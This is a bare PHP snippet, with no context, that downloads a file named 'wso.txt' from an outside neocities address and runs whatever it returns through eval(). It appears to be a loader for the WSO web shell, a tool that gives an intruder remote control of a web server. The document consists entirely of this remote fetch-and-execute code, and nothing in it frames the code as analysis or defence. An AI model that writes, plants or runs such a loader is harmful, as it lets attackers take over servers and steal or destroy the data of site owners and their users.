$url = "https://kwleopw.neocities.org/wso.txt";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$tag= curl_exec($ch);
curl_close($ch);
eval("" . ("$tag"));